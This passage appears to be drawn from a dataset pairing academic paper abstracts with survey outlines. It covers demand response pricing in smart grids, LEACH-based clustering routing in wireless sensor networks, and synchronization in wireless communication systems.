Then, we develop a smart electricity billing mechanism that can enforce both optimality and fairness in autonomous DR systems in a decentralized fashion. --- paper_title: Dynamic Pricing? Not So Fast! A Residential Consumer Perspective paper_content: With the installation of smart metering, will residential customers be moved to "dynamic" pricing? Some supporters of changing residential rate design from a fixed and stable rate structure believe customers should be required to take electric service with time-variant price signals. Not so fast, though! There are real implications associated with this strategy. --- paper_title: DEMAND RESPONSE EXPERIENCE IN EUROPE: POLICIES, PROGRAMMES AND IMPLEMENTATION paper_content: Over the last few years, load growth, increases in intermittent generation, declining technology costs and increasing recognition of the importance of customer behaviour in energy markets have brought about a change in the focus of Demand Response (DR) in Europe. The long standing programmes involving large industries, through interruptible tariffs and time of day pricing, have been increasingly complemented by programmes aimed at commercial and residential customer groups. Developments in DR vary substantially across Europe reflecting national conditions and triggered by different sets of policies, programmes and implementation schemes. This paper examines experiences within European countries as well as at European Union (EU) level, with the aim of understanding which factors have facilitated or impeded advances in DR. It describes initiatives, studies and policies of various European countries, with in-depth case studies of the UK, Italy and Spain. It is concluded that while business programmes, technical and economic potentials vary across Europe, there are common reasons as to why coordinated DR policies have been slow to emerge. This is because of the limited knowledge on DR energy saving capacities; high cost estimates for DR technologies and infrastructures; and policies focused on creating the conditions for liberalising the EU energy markets. --- paper_title: Tackling co-existence and fairness challenges in autonomous Demand Side Management paper_content: Consider a smart grid system in which every user may or may not choose to participate in Demand Side Management (DSM). This will lead to a general co-existence problem between participant and non-participant users. To gain insights, first, we show that some existing electricity billing mechanisms suffer from severe fairness and co-existence defects. Next, we propose an alternative billing mechanism that can tackle the coexistence and fairness problems by taking into account not only the users' total load, but also the exact shape of their load profiles. Our analytical results provide mild sufficient conditions on the choice of system parameters to assure fairness. Furthermore, our simulation results confirm that the proposed billing mechanism significantly improves the fairness index of the DSM system. --- paper_title: Smart Grids and Beyond: Achieving the Full Potential of Electricity Systems paper_content: This paper explores how electricity systems may evolve in the 21st century. The paper focuses on some fundamental challenges facing the utilization of electricity today and for years to come. Paralleling the challenges, several directions of how new solutions may emerge are suggested. In this context, some new approaches to manage power system development and deployment are outlined.
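The billing-oriented papers above argue that bills should depend on the shape of a user's load profile, not only on its total. The snippet below is a hypothetical, simplified cost-sharing rule in that spirit; the cited papers' actual mechanisms differ, and the quadratic cost coefficients and example profiles are assumptions made for illustration. With this rule, a flat profile and a peaky profile with the same total energy receive different bills, which is the property the fairness discussion turns on.

```python
# Illustrative sketch only: a load-shape-aware proportional cost allocation.
import numpy as np

def hourly_cost(total_load, a=0.05, b=0.2):
    """Assumed convex generation cost per hour: a*L^2 + b*L (illustrative coefficients)."""
    return a * total_load**2 + b * total_load

def bills(loads):
    """loads: (num_users, 24) array. Each hour's cost is split among users in
    proportion to their share of that hour's total load."""
    total = loads.sum(axis=0)                      # system load per hour
    cost = hourly_cost(total)                      # system cost per hour
    shares = np.divide(loads, total, out=np.zeros_like(loads), where=total > 0)
    return (shares * cost).sum(axis=1)             # one bill per user

flat = np.full(24, 1.0)                            # 24 kWh spread evenly over the day
peaky = np.zeros(24); peaky[18:22] = 6.0           # same 24 kWh, all in the evening peak
print(bills(np.vstack([flat, peaky])))             # the peaky profile pays more
```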
--- paper_title: Deployment of demand response as a real-time resource in organized markets paper_content: The use of DR as a dispatchable resource in the real-time energy markets should be encouraged, not discouraged. We are fortunate that the smart-grid technology now exists to fully exploit this valuable resource. --- paper_title: Price-Responsive Demand Management for a Smart Grid World paper_content: Price-responsive demand is essential for the success of a smart grid. However, existing demand-response programs run the risk of causing inefficient price formation. This problem can be solved if each retail customer could establish a contract-based baseline through demand subscription before joining a demand-response program. --- paper_title: Incorporating fairness within Demand response programs in smart grid paper_content: Basic Demand response (DR) programs aim to modulate the demand of electricity in accordance with its supply. The existing DR programs have only been of limited success, though the participation has steadily increased in the recent past. This paper establishes the lack of fairness principles within the DR programs, as perceived by the customers to be one of the key deterrents. Fair DR (FDR) scheme criteria are defined and compared with existing pricing schemes. In this context, a simplified pricing model that takes into consideration fairness criteria for residential category is also proposed in this paper. The proposed pricing model is simulated in Gridlab-D and the results are compared with that of the flat and the price based pricing schemes. Initial results establish that our pricing scheme is fair, it flattens the demand curve over a day and provides a win-win situation for both - the customer and the utility company. --- paper_title: Case studies of smart grid demand response programs in North America paper_content: Demand response services that engage consumers are an important emerging aspect of the smart grid. The advent of new consumer-facing technologies that communicate with the electric utility is enabling this transformation. This paper presents and analyzes case studies of different electric utility programs, including enabling technologies and incentives, on smart grid demand response. The program successes are evaluated in terms of reduction in peak load and/or customer energy usage and customer satisfaction. An analysis of lessons learned is provided on how various incentives can affect the success and scalability of smart grid demand response programs. --- paper_title: Piloting the Smart Grid paper_content: To address the likely impact of the smart grid on customers, utilities, and society as a whole, it may be necessary to conduct a pilot. When should a pilot be conducted and how should it be conducted? What validity criteria should the pilot satisfy? Here are issues to consider. --- paper_title: The Ethics of Dynamic Pricing paper_content: Dynamic pricing has garnered much interest among regulators and utilities, since it has the potential for lowering energy costs for society. But the deployment of dynamic pricing has been remarkably tepid. The underlying premise is that dynamic pricing is unfair. But the presumption of unfairness in dynamic pricing rests on an assumption of fairness in today's tariffs. 
--- paper_title: Intelligent Scheduling of Hybrid and Electric Vehicle Storage Capacity in a Parking Lot for Profit Maximization in Grid Power Transactions paper_content: This paper proposes an intelligent method for scheduling usage of available energy storage capacity from plug-in hybrid electric vehicles (PHEV) and electric vehicles (EV). The batteries on these vehicles can either provide power to the grid when parked, known as the vehicle-to-grid (V2G) concept, or take power from the grid to charge the batteries on the vehicles. A scalable parking lot model is developed with different parameters assigned to fleets of vehicles. The size of the parking lot is assumed to be large enough to accommodate the number of vehicles performing grid transactions. In order to determine the appropriate charge and discharge times throughout the day, binary particle swarm optimization is applied. Price curves from the California ISO database are used in this study to have realistic price fluctuations. Finding optimal solutions that maximize profits to vehicle owners while satisfying system and vehicle owners' constraints is the objective of this study. Different fleets of vehicles are used to approximate a varying customer base and demonstrate the scalability of parking lots for V2G. The results are compared for consistency and scalability. Discussions on how this technique can be applied to other grid issues such as peaking power are included at the end. --- paper_title: Predicting user comfort level using machine learning for Smart Grid environments paper_content: Smart Grid with Time-of-Use (TOU) pricing brings new ways of cutting costs for energy consumers and conserving energy. This is done by utilities suggesting to users ways of using devices that lower their energy bills, while keeping in mind the utilities' own interest in smoothing the peak demand curve. However, as suggested in previous related research, users' comfort needs must be addressed in order to make the system work efficiently. In this work, we validate the hypothesis that user preferences and habits can be learned and that the user comfort level for new patterns of device usage can be predicted. We investigate how machine learning algorithms, specifically supervised machine learning algorithms, can be used to achieve this. We also compare the prediction accuracies of three commonly used supervised learning algorithms, as well as the effect that the number of training samples has on the prediction accuracy. Furthermore, we analyse how sensitive the prediction accuracies yielded by each algorithm are to the number of training samples. --- paper_title: Artificial neural network for load forecasting in smart grid paper_content: Developing the smart grid is an irresistible trend in the improvement of electric power systems; it applies a large number of new technologies in power generation, transmission, distribution and utilization to achieve optimization of the power configuration and energy saving. As one of the key links in making a grid smarter, load forecasting plays a significant role in power system planning and operation. Many approaches, such as Expert Systems, Grey System Theory, and Artificial Neural Networks (ANN), are employed for load forecasting and simulation. This paper illustrates the application of the ANN to load forecasting based on the practical situation in Ontario Province, Canada.
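As a rough illustration of the neural-network load forecasting discussed in the last abstract above, the sketch below fits a small feed-forward network to synthetic hourly data and predicts the next hour's load from the previous 24 hours. The network size, the synthetic load model and the train/test split are arbitrary choices for the example, not details taken from the cited paper.

```python
# Minimal illustrative sketch (not the cited paper's model): next-hour load forecasting
# with a small feed-forward neural network on synthetic data.
import numpy as np
from sklearn.neural_network import MLPRegressor

rng = np.random.default_rng(1)
hours = np.arange(24 * 60)                                        # 60 days of hourly samples
load = 10 + 3 * np.sin(2 * np.pi * hours / 24) + rng.normal(0, 0.3, hours.size)

LAGS = 24
X = np.array([load[t - LAGS:t] for t in range(LAGS, load.size)])  # previous 24 hourly loads
y = load[LAGS:]                                                   # next-hour load to predict
split = int(0.8 * len(y))

model = MLPRegressor(hidden_layer_sizes=(32,), max_iter=2000, random_state=0)
model.fit(X[:split], y[:split])
pred = model.predict(X[split:])
print("test MAE:", np.mean(np.abs(pred - y[split:])))
```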
--- paper_title: Forecasting for smart grid applications with Higher Order Neural Networks paper_content: This work presents the design of a neural network which combines higher order terms in its input layer and an Extended Kalman Filter (EKF) based algorithm for its training. The neural network based scheme is defined as a Higher Order Neural Network (HONN) and its applicability is illustrated by means of time series forecasting for three important variables present in smart grids: Electric Load Demand (ELD), Wind Speed (WS) and Wind Energy Generation (WEG).
The proposed model is trained and tested using real data values taken from a microgrid system in the UADY School of Engineering. The length of the regression vector is determined via the Lipschitz quotients methodology. --- paper_title: Modeling and forecasting hourly electric load by multiple linear regression with interactions paper_content: Short-term electric load modeling and forecasting has been intensively studied during the past 50 years. With the emerging development of smart grid technologies, demand side management (DSM) starts to attract the attention of electric utilities again. To perform a decent DSM, beyond when and how much the demand will be, the utilities are facing another question: why is the electricity being consumed? In other words, what are the factors driving the fluctuation of the electric load at a particular time period? Understanding this issue can also be beneficial for the electric load forecasting with the purpose of energy purchase. This paper proposes a modern treatment of a classic technique, multiple linear regression, to model the hourly demand and investigate the causality of the consumption of electric energy. Various interactions are discovered, discussed, tested, and interpreted in this paper. The proposed approach has been used to generate the 3-year hourly energy demand forecast for a US utility. --- paper_title: Power prediction in smart grids with evolutionary local kernel regression paper_content: Electric grids are moving from a centralized single supply chain towards a decentralized bidirectional grid of suppliers and consumers in an uncertain and dynamic scenario. Soon, the growing smart meter infrastructure will allow the collection of terabytes of detailed data about the grid condition, e.g., the state of renewable electric energy producers or the power consumption of millions of private customers, in very short time steps. For reliable prediction, strong and fast regression methods are necessary that are able to cope with these challenges. In this paper we introduce a novel regression technique, i.e., evolutionary local kernel regression, a kernel regression variant based on local Nadaraya-Watson estimators with independent bandwidths distributed in data space. The model is regularized with the CMA-ES, a stochastic non-convex optimization method. We experimentally analyze the load forecast behavior on real power consumption data. The proposed method is easily parallelizable, and therefore well suited for large-scale scenarios in smart grids. --- paper_title: Creating an ambient-intelligence environment using embedded agents paper_content: The Essex intelligent dormitory, iDorm, uses embedded agents to create an ambient-intelligence environment. In a five-and-a-half-day experiment, a user occupied the iDorm, testing its ability to learn user behavior and adapt to user needs. The embedded agent discreetly controls the iDorm according to user preferences. Our work focuses on developing learning and adaptation techniques for embedded agents. We seek to provide online, lifelong, personalized learning of anticipatory adaptive control to realize the ambient-intelligence vision in ubiquitous-computing environments. We developed the Essex intelligent dormitory, or iDorm, as a test bed for this work and an exemplar of this approach. ---
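The kernel-regression reference above builds on local Nadaraya-Watson estimators. For orientation, a plain Nadaraya-Watson estimator with a single fixed bandwidth is sketched below; the evolutionary variant in the cited paper additionally adapts per-estimator bandwidths with CMA-ES, which is not reproduced here. The bandwidth h and the synthetic hour-of-day data are illustrative assumptions.

```python
# Sketch of plain Nadaraya-Watson (Gaussian kernel) regression for load prediction.
import numpy as np

def nadaraya_watson(x_train, y_train, x_query, h=1.5):
    """Kernel-weighted average of training targets around each query point."""
    # pairwise squared distances between query and training inputs
    d2 = ((x_query[:, None, :] - x_train[None, :, :]) ** 2).sum(axis=2)
    w = np.exp(-0.5 * d2 / h**2)
    return (w @ y_train) / w.sum(axis=1)

rng = np.random.default_rng(2)
x_train = rng.uniform(0, 24, size=(200, 1))                         # hour of day
y_train = 10 + 3 * np.sin(2 * np.pi * x_train[:, 0] / 24) + rng.normal(0, 0.3, 200)
x_query = np.array([[6.0], [12.0], [18.0]])
print(nadaraya_watson(x_train, y_train, x_query))                   # predicted loads
```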
Title: A Survey on Demand Response Programs in Smart Grids: Pricing Methods and Optimization Algorithms
Section 1: Introduction
Description 1: Write an introduction to the paper, explaining the concept of Demand Side Management and its advantages. Also, introduce the scope and structure of the survey.
Section 2: Main Objectives of DR
Description 2: Summarize the main objectives of applying a DR scheme, including the reduction of total power consumption, total needed power generation, and changing demand to follow the available supply.
Section 3: DR Management
Description 3: Describe the implementation of DR methods, focusing on the control of customer power consumption behavior and the cooperation of main participants in a DR program.
Section 4: DR Applicability
Description 4: Discuss the applicability of DR programs to different types of consumers, such as residential, commercial, and industrial sectors.
Section 5: DR Communication Requirements
Description 5: Detail the communication infrastructure requirements for the effective and reliable operation of DR programs in smart grids.
Section 6: Adversative Conditions in DR Implementation
Description 6: Outline potential issues and adverse conditions that can affect the success of DR programs, such as Cold Load PickUp and voltage violations.
Section 7: Classification of DR Models
Description 7: Classify DR schemes from the literature based on control mechanisms, motivations offered to consumers, and decision variables. Include detailed subsections on each classification.
Section 8: Optimization Methods in DR Programs
Description 8: Review work on optimization methods proposed for DR programs, categorized by the target of the optimization procedure, such as minimization of electricity cost, maximization of social welfare, and minimization of aggregated power consumption.
Section 9: Application of Game Theory to DR Programs
Description 9: Discuss the application of game-theoretic methods to DR programs for optimal decision-making and resource management.
Section 10: Conclusion: Lessons Learned and Future Directions
Description 10: Summarize key lessons learned from existing DR programs and identify future research directions to improve efficiency, scalability, and reliability in smart grid environments.
A Review on Energy Efficient of Clustering-based Routing Protocol in Wireless Sensor Network
13
--- paper_title: Improvement on LEACH Protocol of Wireless Sensor Network (VLEACH) paper_content: This paper presents a new version of the LEACH protocol called VLEACH, which aims to reduce energy consumption within the wireless network. We evaluate both LEACH and V-LEACH through extensive simulations using the OMNET++ simulator, which show that VLEACH performs better than the LEACH protocol. --- paper_title: P-EECHS: Parametric Energy Efficient Cluster Head Selection protocol for Wireless Sensor Network paper_content: This paper presents a Parametric Energy Efficient Cluster Head Selection (P-EECHS) protocol which improves the LEACH protocol and aims to reduce energy consumption within the wireless sensor network. This paper improves the LEACH protocol by improving the election strategy of the cluster-head nodes based on the remaining energy of sensor nodes, the distance from the base station, and the number of consecutive rounds in which a node has not been a cluster head. It also considers whether a node's remaining energy is sufficient to send the aggregated data to the base station; if it is not, the node cannot be selected as cluster head. Considering these parameters, simulation results show that the proposed protocol can better reduce energy consumption and prolong the lifetime of the wireless sensor network with respect to the metrics FND (First Node Dies), HND (Half Node Dies) and LND (Last Node Dies), compared to LEACH and EECHS. --- paper_title: Energy-aware routing in cluster-based sensor networks paper_content: There has been a growing interest in the applications of sensor networks. Since sensors are generally constrained in on-board energy supply, efficient management of the network is crucial in extending the life of the sensor. We present a novel approach for energy-aware and context-aware routing of sensor data. The approach calls for network clustering and assigns a less-energy-constrained gateway node that acts as a centralized network manager. Based on energy usage at every sensor node and changes in the mission and the environment, the gateway sets routes for sensor data, monitors latency throughout the cluster, and arbitrates medium access among sensors. Simulation results demonstrate that our approach can achieve substantial energy saving. --- paper_title: Inter-cluster route algorithm based on the gateway for wireless sensor networks paper_content: As an active branch of routing technology, cluster-based routing protocols have a number of advantages, such as convenient topology management and energy efficiency. This paper advances a new inter-cluster routing algorithm (IRCG) based on gateways. Considering that the node transmitting power is not adjustable, the routing algorithm uses a single hop for intra-cluster communication; for inter-cluster communication, it communicates with the sink node in a multi-hop way through the cluster heads and the elected gateway nodes, which build the reverse aggregation tree. Simulation results show that the protocol achieves better results in enhancing system lifetime than LEACH. ---
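Several of the protocols referenced above start from the stochastic cluster-head election of LEACH, in which an eligible node becomes a cluster head in round r with threshold probability T(n) = P / (1 - P (r mod 1/P)). The sketch below simulates that election; the desired cluster-head fraction P, the node count and the number of rounds are illustrative values only, and the per-node bookkeeping of the 1/P-round ineligibility window is a simplification.

```python
# Sketch of the stochastic LEACH cluster-head election (illustrative parameters).
import random

P, NUM_NODES, ROUNDS = 0.05, 100, 40
EPOCH = int(1 / P)                                   # a node may be head once per 1/P rounds
random.seed(3)
rounds_since_ch = [EPOCH] * NUM_NODES                # start with every node eligible
counts = []

for r in range(ROUNDS):
    heads = []
    for n in range(NUM_NODES):
        eligible = rounds_since_ch[n] >= EPOCH       # set G: not a head in the last 1/P rounds
        threshold = P / (1 - P * (r % EPOCH)) if eligible else 0.0
        if random.random() < threshold:
            heads.append(n)
            rounds_since_ch[n] = 0
        else:
            rounds_since_ch[n] += 1
    counts.append(len(heads))

print("cluster heads per round: min", min(counts),
      "mean", sum(counts) / len(counts), "max", max(counts))
```

On average about P * NUM_NODES nodes elect themselves per round, and the growing threshold within each 1/P-round epoch ensures every node serves as head once per epoch.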
Title: A Review on Energy Efficient of Clustering-based Routing Protocol in Wireless Sensor Network
Section 1: INTRODUCTION
Description 1: Introduce the concept of Wireless Sensor Networks (WSNs), their components, and their applications. Emphasize the importance of energy efficiency in enhancing the quality of service.
Section 2: ISSUES IN WSN
Description 2: Discuss the major issues in Wireless Sensor Networks, starting with the Low-Energy Adaptive Clustering Hierarchy (LEACH) protocol and its significance in power saving.
Section 3: Clusters Formation in LEACH
Description 3: Describe the process of cluster formation in LEACH protocol, including the setup phase and steady-state operation phase, along with the calculation of the threshold probability.
Section 4: Energy Performance of clustering-based routing protocol
Description 4: Analyze the energy performance of LEACH compared to direct transmission, the effect of the number of clusters on LEACH energy performance, and various enhancements to LEACH that mitigate its disadvantages.
Section 5: E-LEACH protocol
Description 5: Explain the improvements in the Energy-LEACH protocol, focusing on the CH selection procedure and how nodes with higher residual energy become CHs.
Section 6: LEACH-C
Description 6: Discuss the centralized clustering algorithm used in LEACH-C, its setup phase, and how it improves performance by dispersing cluster heads throughout the network.
Section 7: V-LEACH
Description 7: Describe the V-LEACH protocol, which includes a vice-CH that replaces the CH when it dies, thus prolonging the network lifetime.
Section 8: EFFICIENT-ROUTING LEACH (ER-LEACH)
Description 8: Outline the Efficient Routing LEACH protocol, which enhances CH selection, reduces overhead of dynamic clusters, and balances load through the zone routing protocol.
Section 9: LEACH - SPARE MANAGEMENT (LEACH-SM)
Description 9: Illustrate the LEACH-SM protocol, which includes an efficient management of spares to extend the lifetime of the WSN by adding a spare selection phase.
Section 10: CLUSTER HEAD SELECTION
Description 10: Summarize the steps involved in cluster head selection, including network information generation, connectivity requirements, and positioning of cluster heads.
Section 11: ELECTION OF GATEWAY NODE
Description 11: Describe the method for selecting gateway nodes based on received messages from cluster heads and how these nodes facilitate inter-cluster communication.
Section 12: Construction of Routing Gathering Tree
Description 12: Explain the construction of a routing gathering tree for efficient data communication, detailing the initialization process and the roles of cluster heads and gateway nodes.
Section 13: CONCLUSION
Description 13: Summarize the key points discussed in the paper, including the impact of base station location, message size, and the proposed clustering routing algorithm to enhance network connectivity and reduce communication overhead.
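Section 4 of the outline above compares LEACH-style clustering with direct transmission. That comparison is usually carried out with a first-order radio energy model; the sketch below uses parameter values commonly assumed in the LEACH literature (50 nJ/bit electronics energy, 100 pJ/bit/m^2 amplifier energy), which are illustrative rather than measured, and it ignores data-aggregation costs.

```python
# Sketch of the first-order radio model used to compare direct transmission with clustering.
E_ELEC = 50e-9        # J/bit, transceiver electronics energy (commonly assumed value)
EPS_AMP = 100e-12     # J/bit/m^2, transmit amplifier energy (commonly assumed value)
K = 2000              # bits per message

def e_tx(bits, dist):
    """Energy to transmit `bits` over distance `dist` (free-space d^2 loss)."""
    return E_ELEC * bits + EPS_AMP * bits * dist**2

def e_rx(bits):
    """Energy to receive `bits`."""
    return E_ELEC * bits

# Direct transmission: every node sends straight to a base station 100 m away.
direct = e_tx(K, 100.0)

# Clustering: a member sends 10 m to its cluster head, which receives the message
# and forwards one (aggregated) message 100 m to the base station.
member = e_tx(K, 10.0)
head = e_rx(K) + e_tx(K, 100.0)

print(f"direct per node: {direct*1e6:.1f} uJ, member: {member*1e6:.1f} uJ, head: {head*1e6:.1f} uJ")
```

In LEACH the head's long-haul cost is amortized over the whole cluster because it forwards a single aggregated message per round and the head role rotates, which is where the overall energy saving comes from.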
Timing and Carrier Synchronization in Wireless Communication Systems: A Survey and Classification of Research in the Last Five Years
8
--- paper_title: Channel Estimation for OFDM paper_content: Orthogonal frequency division multiplexing (OFDM) has been widely adopted in modern wireless communication systems due to its robustness against the frequency selectivity of wireless channels. For coherent detection, channel estimation is essential for receiver design. Channel estimation is also necessary for diversity combining or interference suppression where there are multiple receive antennas. In this paper, we will present a survey on channel estimation for OFDM. This survey will first review traditional channel estimation approaches based on channel frequency response (CFR). Parametric model (PM)-based channel estimation, which is particularly suitable for sparse channels, will be also investigated in this survey. Following the success of turbo codes and low-density parity check (LDPC) codes, iterative processing has been widely adopted in the design of receivers, and iterative channel estimation has received a lot of attention since that time. Iterative channel estimation will be emphasized in this survey as the emerging iterative receiver improves system performance significantly. The combination of multiple-input multiple-output (MIMO) and OFDM has been widely accepted in modern communication systems, and channel estimation in MIMO-OFDM systems will also be addressed in this survey. Open issues and future work are discussed at the end of this paper. --- paper_title: Dirty RF: a new paradigm paper_content: The implementation challenge for new low-cost low-power wireless modem transceivers has continuously been growing with increased modem performance, bandwidth, and carrier frequency. Up to now we have been designing transceivers in a way that we are able to keep the analog (RF) problem domain widely separated from the digital signal processing design. However, with today’s deep sub-micron technology, analog impairments – “dirt effects” – are reaching a new problem level which requires a paradigm shift in the design of transceivers. Examples of these impairments are phase noise, non-linearities, I/Q imbalance, ADC impairments, etc. In the world of “Dirty RF” we assume to design digital signal processing such that we can cope with a new level of impairments, allowing lee-way in the requirements set on future RF sub-systems. This paper gives an overview of the topic and presents analytical evaluations of the performance losses due to RF impairments as well as algorithms that allow to live with imperfect RF by compensating the resulting error effects using digital baseband processing. --- paper_title: Synchronization Techniques for Orthogonal Frequency Division Multiple Access (OFDMA): A Tutorial Review paper_content: Orthogonal frequency division multiple access (OFDMA) has recently attracted vast research attention from both academia and industry and has become part of new emerging standards for broadband wireless access. Even though the OFDMA concept is simple in its basic principle, the design of a practical OFDMA system is far from being a trivial task. Synchronization represents one of the most challenging issues and plays a major role in the physical layer design. The goal of this paper is to provide a comprehensive survey of the latest results in the field of synchronization for OFDMA systems, with tutorial objectives foremost. After quantifying the effects of synchronization errors on the system performance, we review some common methods to achieve timing and frequency alignment in a downlink transmission. 
We then consider the uplink case, where synchronization is made particularly difficult by the fact that each user's signal is characterized by different timing and frequency errors, and the base station has thus to estimate a relatively large number of unknown parameters. A second difficulty is related to how the estimated parameters must be employed to correct the uplink timing and frequency errors. The paper concludes with a comparison of the reviewed synchronization schemes in an OFDMA scenario inspired by the IEEE 802.16 standard for wireless metropolitan area networks. --- paper_title: Fundamentals of Large Sensor Networks: Connectivity, Capacity, Clocks and Computation paper_content: Sensor networks potentially feature large numbers of nodes. The nodes can monitor and sense their environment over time, communicate with each other over a wireless network, and process information that they exchange with each other. They differ from data networks in that the network as a whole may be designed for a specific application. We study the theoretical foundations of such large-scale sensor networks. We address four fundamental organizational and operational issues related to large sensor networks: connectivity, capacity, clocks, and function computation. To begin with, a sensor network must be connected so that information can indeed be exchanged between nodes. The connectivity graph of an ad hoc network is modeled as a random graph and the critical range for asymptotic connectivity is determined, as well as the critical number of neighbors that a node needs to connect to. Next, given connectivity, we address the issue of how much data can be transported over the sensor network. We present fundamental bounds on capacity under several models, as well as architectural implications for how wireless communication should be organized. Temporal information is important both for the applications of sensor networks as well as their operation. We present fundamental bounds on the synchronizability of clocks in networks, and also present and analyze algorithms for clock synchronization. Finally, we turn to the issue of gathering relevant information, which sensor networks are designed to do. One needs to study optimal strategies for in-network aggregation of data, in order to reliably compute a composite function of sensor measurements, as well as the complexity of doing so. We address the issue of how such computation can be performed efficiently in a sensor network and the algorithms for doing so, for some classes of functions. --- paper_title: What Will 5G Be? paper_content: What will 5G be? What it will not be is an incremental advance on 4G. The previous four generations of cellular technology have each been a major paradigm shift that has broken backward compatibility. Indeed, 5G will need to be a paradigm shift that includes very high carrier frequencies with massive bandwidths, extreme base station and device densities, and unprecedented numbers of antennas. However, unlike the previous four generations, it will also be highly integrative: tying any new 5G air interface and spectrum together with LTE and WiFi to provide universal high-rate coverage and a seamless user experience. To support this, the core network will also have to reach unprecedented levels of flexibility and intelligence, spectrum regulation will need to be rethought and improved, and energy and cost efficiencies will become even more critical considerations.
This paper discusses all of these topics, identifying key challenges for future research and preliminary 5G standardization activities, while providing a comprehensive overview of the current literature, and in particular of the papers appearing in this special issue. --- paper_title: Multi-Cell MIMO Cooperative Networks: A New Look at Interference paper_content: This paper presents an overview of the theory and currently known techniques for multi-cell MIMO (multiple input multiple output) cooperation in wireless networks. In dense networks where interference emerges as the key capacity-limiting factor, multi-cell cooperation can dramatically improve the system performance. Remarkably, such techniques literally exploit inter-cell interference by allowing the user data to be jointly processed by several interfering base stations, thus mimicking the benefits of a large virtual MIMO array. Multi-cell MIMO cooperation concepts are examined from different perspectives, including an examination of the fundamental information-theoretic limits, a review of the coding and signal processing algorithmic developments, and, going beyond that, consideration of very practical issues related to scalability and system-level integration. A few promising and quite fundamental research avenues are also suggested. --- paper_title: Digital Communication Receivers: Synchronization, Channel Estimation, and Signal Processing paper_content: Digital Communication Receivers offers a complete treatment on the theoretical and practical aspects of synchronization and channel estimation from the standpoint of digital signal processing. The focus on these increasingly important topics, the systematic approach to algorithm development, and the linked algorithm-architecture methodology in digital receiver design are unique features of this book. The material is structured according to different classes of transmission channels. In Part C, baseband transmission over wire or optical fiber is addressed. Part D covers passband transmission over satellite or terrestrial wireless channels. Part E deals with transmission over fading channels. Designed for the practicing communication engineer and the graduate student, the book places considerable emphasis on helpful examples, summaries, illustrations, and bibliographies. Contents include basic material, baseband communications, passband transmission, receiver structure for PAM signals, synthesis of synchronization algorithms, performance analysis of synchronizers, bit error degradation caused by random tracking errors, frequency estimation, timing adjustment by interpolation, DSP system implementation, characterization, modeling, and simulation of linear fading channels, detection and parameter synchronization on fading channels, receiver structures for fading channels, parameter synchronization for flat fading channels, and parameter synchronization for selective fading channels. --- paper_title: OFDM and Its Wireless Applications: A Survey paper_content: Orthogonal frequency-division multiplexing (OFDM) effectively mitigates intersymbol interference (ISI) caused by the delay spread of wireless channels. Therefore, it has been used in many wireless systems and adopted by various standards. In this paper, we present a comprehensive survey on OFDM for wireless communications.
We address basic OFDM and related modulations, as well as techniques to improve the performance of OFDM for wireless communications, including channel estimation and signal detection, time- and frequency-offset estimation and correction, peak-to-average power ratio reduction, and multiple-input-multiple-output (MIMO) techniques. We also describe the applications of OFDM in current systems and standards. --- paper_title: Wireless Visions: A Look to the Future by the Fellows of the WWRF paper_content: In less than two decades, mobile communication has developed from a niche application to a mass-market high-tech product, having experienced an unprecedented growth, never achieved by any other technology, whether radio, television, or even the Internet. Thirteen well-known experts, all of them honored as WWRF Fellows, have been interviewed and shared their expertise and opinions on ten questions about the wireless future, as presented here. The answers span a wide field from air interfaces, networks, devices, applications, to new ways of interaction, to name a few. Although the ideas and views presented here are not one common vision, they should provide stimulating ideas and questions for future research, and it will be exciting to see how things are really going to develop. The Fellows' ideas also clearly show the fascination, impact, and opportunities wireless communications has and will have in the future. --- paper_title: Emergent Slot Synchronization in Wireless Networks paper_content: This paper presents a biologically inspired approach for distributed slot synchronization in wireless networks. This is facilitated by modifying and extending a synchronization model based on the theory of pulse-coupled oscillators. The proposed Meshed Emergent Firefly Synchronization (MEMFIS) multiplexes synchronization words with data packets and adapts local clocks upon the reception of synchronization words from neighboring nodes. In this way, a dedicated synchronization phase is mitigated, as a network-wide slot structure emerges seamlessly over time as nodes exchange data packets. Simulation results demonstrate that synchronization is accomplished regardless of the arbitrary initial situation. There is no need for the selection of master nodes, as all nodes cooperate in a completely self-organized manner to achieve slot synchrony. Moreover, the algorithm is shown to scale with the number of nodes, works in meshed networks, and is robust against interference and collisions in dense networks. --- paper_title: Distributed synchronization in wireless networks paper_content: This article has explored history, recent advances, and challenges in distributed synchronization for distributed wireless systems. It is focused on synchronization schemes based on exchange of signals at the physical layer and corresponding baseband processing, wherein analysis and design can be performed using known tools from signal processing. Emphasis has also been given on the synergy between distributed synchronization and distributed estimation/detection problems. Finally, we have touched upon synchronization of nonperiodic (chaotic) signals. Overall, we hope to have conveyed the relevance of the subject and to have provided insight on the open issues and available analytical tools that could inspire further research within the signal processing community. 
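The emergent slot synchronization entry above builds on pulse-coupled (firefly) oscillators. The following numpy sketch is a deliberately simplified, all-to-all version of that mechanism, not the MEMFIS algorithm itself: every node keeps a free-running slot phase and nudges it whenever it hears another node fire. The number of nodes, coupling strength, and simulation length are illustrative assumptions.

```python
import numpy as np

# Toy pulse-coupled ("firefly") oscillator simulation in the spirit of the
# emergent slot synchronization entry above. Simplified all-to-all model, not
# the MEMFIS algorithm: each node keeps a free-running slot phase and, whenever
# any node fires, the others nudge their phase forward slightly.
rng = np.random.default_rng(0)
num_nodes = 20
T = 1.0              # nominal slot period
coupling = 0.05      # multiplicative phase nudge applied when a firing is heard
dt = 1e-3
phase = rng.uniform(0.0, T, num_nodes)   # arbitrary initial clock phases

for _ in range(int(50 * T / dt)):        # simulate roughly 50 slot periods
    phase += dt                          # free-running clocks advance
    fired = phase >= T
    if fired.any():
        phase[fired] -= T                # firing nodes wrap around
        phase[~fired] = np.minimum(phase[~fired] * (1.0 + coupling), T)

# circular coherence: values near 1 mean the slot boundaries have aligned
coherence = np.abs(np.mean(np.exp(2j * np.pi * phase / T)))
print(f"slot phase coherence after coupling: {coherence:.3f}")
```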
